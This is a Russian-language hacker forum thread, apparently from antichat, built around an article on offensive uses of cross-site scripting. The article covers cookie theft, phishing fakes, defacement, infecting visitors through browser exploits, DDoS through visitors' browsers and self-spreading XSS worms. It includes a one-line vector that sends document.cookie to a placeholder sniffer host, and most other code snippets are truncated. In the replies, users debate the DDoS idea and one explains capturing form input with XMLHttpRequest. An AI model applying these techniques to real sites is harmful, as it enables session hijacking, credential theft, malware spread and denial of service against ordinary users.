![]() |
Темная сторона Xss
Интро
Статья уже давно готовилась мной, ее предтече стало ВОТ ЭТО голосование, в котором многие заявили что xss это уязвиость вчеращнего дня, сейчас я попытаюсь опровергнуть это утверждение Основная масса людей считают что xss может использоваться только для кражи cookies, либо исключительно ради эстетического удовольствия лицезрения красивых окошек с различными надписями)) В этой статье я не буду рассматривать сложные xss вектора и не буду расписывать различные способы обхода фильтрации, различные формы построения вектора, вложенные скрипты- обо всем этом можно почитать совершив поиск по форуму План Говорить будем по следующему плану, постораюсь осветить все хитрости cross site scripting 1)Кража куков 2)Фейк\Дефейсы 3)Троянизация удаленного юзера 4)ДДос 5)xss черви 6)Менее используемые методы Мэйн 1 Итак самое распространенный и самое юзаемый вид xss атак: Интеграция xss вектора( читай яваскрипт кода ), который выполняясь в браузере клиента отсылает куки на снифер, далее происходит подмена авторизационных данных, ну а дальше Садом и Гомора на любой вкус)) (читай - делай что хочешь) Напомню самые простые конструкции xss векторов приминимых в любом браузере Код:
<script>document.location="SNIFFER"+document.cookie</script>Некотрые просто уверены, что кроме шутливого дефейса ничего сделать нельзя Что ж иногда даже в таком дефейсе есть некий шарм, например деф сделаный мной на каком то кинемотографическом портале Вектор можно посмотреть здесь: PHP код:
С другой строны фейк метод позволяет получить вожделенный пароль не очень опытного пользователя. Чаще всего юзается такой способ: пользователь редиректится на фейковую страничку, предворительно подготовленную, с схожим с основным ресурсом урлом (например ranbler). С другой стороны, даже в известном журнале Хацкер, упоминали о возможной подмене адресной строки в браузере по средствам нами любимого Яваскрипта, что заметно улучшает внешний вид фейка(http://www.securitylab.ru/vulnerability/291585.php))) Так же можно действовать методом связаных xss веторов, вообщем действуйте по обстоятельствам С другой стороны можно использовать обьект яваскрипт - XMLHTTPrequeset, в таком случае работает php снифер и сформированый xss вектор, который с поомощью XMLHTTPrequeset передает интересующую нас информацию об удаленном пользователе: Код:
function HTTPRequest (url)3 Пожалуй наиболее опасный способ использования xss: Троянизация производится посредством использования эксплойтов для популярных браузеров. Чтобы убить сразу двух зайцев, используем уже приевшийся Яваскрипт)). А именно navigator.appNAME. Составляем приблизительно следующий вектор: Код:
<script language="JavaScript">PHP код:
PHP код:
4 ДДос(мемберы МОА и выше не читают этот раздел=))) Сразу надо оговориться, что для использования такого типа ДДоса и получения "неформального" ботнета, страничка с интегрированым кодом должна быть достаточно посещаемой =) Используем тот же метод что и во втором пункте Код:
<script language="javascript">PHP код:
xss черви очень любопытный вид xss атаки, все же требует использования активных xss: перманентное размещение на сервере и отсутствие необходимости рекламить страничку с интегрированым кодом, а ваш заикссесеный профиль или тему будут просматривать гораздо чаще, чем сформированый и разосланый линк(хотя тоже можно юзать). Естественно каждый попавший в заиксесенную ловушку выполнит в браузере злонамеренный код, фокус червя в том, что он вдобавок ко всему может сам себя постить на форуме или в блоге, снова используем XMLHttpRequest. Код:
function HTTPRequest (url)При этом ничто не мешает совместит DDos атаки и код xss червя... Внедряем в код xss вектора скрипт для отправки сообщений и вот пошла рассылка спама. Вообщем делайте что в голову всбредет и до чего руки дотянутся. Благо все выложенные мной скрипты публичны и скомбинировать их, создать цепочки выполняемых кодов врят ли составит труда. 6 Напоследок несколько слов о наименее используемых видах атак, вкратце. Раскрутка заказного сайта: соответсвенно реализуеться так же как и ДДос Подмена личной информции пользователя: в теории то возможно, сейчас пытаюсь понять реализацию, как только разберусь- допишу Энд В качестве финального слова скажу, что использования активных xss более уместно при выполнение какого то из этих пунктов. Спасибо за внимание Снял видео по теме, можно посмотреть PHP код:
|
Ничего нового не узнал...
Про ддос вообще бред...сколько же надо лохов найти =\ Да и все что здесь написано также можно найти с помощью поиска |
насчет ддос,
если страничка посещаемая, то вместо твоего скрипта проще засунуть эксплойт и лить exe с ботом посетителям что за бред... |
Цитата:
|
Цитата:
|
Тема не освещена и на 50 процентов , иди дорабатывай.
|
Тема сисек не раскрыта. Бузя раскрыл лучше
|
Кстати зря насчет ддос через фреймы ругались... Неплохо работает
|
Цитата:
uncaught exception: Permission denied to call method XMLHttpRequest.open P.S. XSS вектор - какое-то странное определение...имхо |
Чтобы получить информацию от пользователя зарегестрированного на http://ya.ru, тебе нужна xss непосредственно на ya.ru
Открой учебник по Яваскрипту и почитай про обьект XMLHttpRequest Xss вектор это оригинальное определение, оно мне нраится, я считаю его подходящим |
За статью +, но есть некоторые замечания
Цитата:
Все тоже самое достаточно хорошо и более подробно описано здесь http://forum.antichat.ru/threadedpost386598.html#post386598 Цитата:
Да, кстати, а что есть светлая сторона xss? ;) |
Цитата:
|
а что такое по-твоему xss-вектор? мне кажется ты нескольно неверно уяснил для себя значение этого слова..
насчет ддос - это не бред, я как-то хотел раскрутить один сайтик и немного не расчитав, ненадолго убил его.. ) кстати, с помощью xss ведь можно устроить и просто дос-атаку.. |
Как я понимаю, xss вектор- это непосредственно яваскрипт код, который выполняется в браузере жертвы, т.е
<script>alert('xss')</script> - alert('xss')- xss вектор |
Цитата:
|
вообще то ДДос реализовать проще чем можно подумть на первый взгляд, особенно если xss на более менее популярной страничке
|
xчувак,перезалей видео плз,я никак не вьезжаю=)буду благадарен
|
И все же вопрос про XMLHttpRequest. про то что работа с удаленным сервером не получится - это понятно. но ни как не могу понять как получить пост и гет. куки и $_SERVER передаются, а вот пост и гет ну ни как. подскажите что нужно дополнить в код
Код:
<script type="text/javascript">Код:
<?php |
Вроде понял где у меня ошибка:
Я думал данные отправленные из формы будут дублированы по XMLHttpRequest, но оказывается нужно явно указывать params. Я правильно понял? то есть теперь необходимо из формы взять данные и вставить в params. А как можно это сделать не модифицируя саму форму? Спасибо и с меня +) |
Такс. в общем провел нужный мне аудит, думаю можно рассказать каким образом провел свою xss.
Так как полного раскрытия темы не нашел ни здесь ни в гугле - думаю может кому то еще пригодится, а может кто то подскажет как можно еще более эффективно юзать xmlhttprequest ;) и так ко всему выше сказанному необходимо получение данных из формы. я использовал объект document.form1.text.value и вот тут необходимо вызвать действие при сабмите. а модифицировать форму не могу. Пришла на выручку особенность всех браузеров обрабатывать в документе body несколько раз! И таким образом прописав в середине Код HTML:
</body>http://xmlhttprequest.ru/ Полностью доступным языком описан данный объект ЗЫ Говорят есть обход ограничения выполнения на локалхосте. но не было времени с этим разобраться. |
нее про ддос это бред еси уж ддосить так с ботов реально а то тут фигня какая то
|
| Время: 02:19 |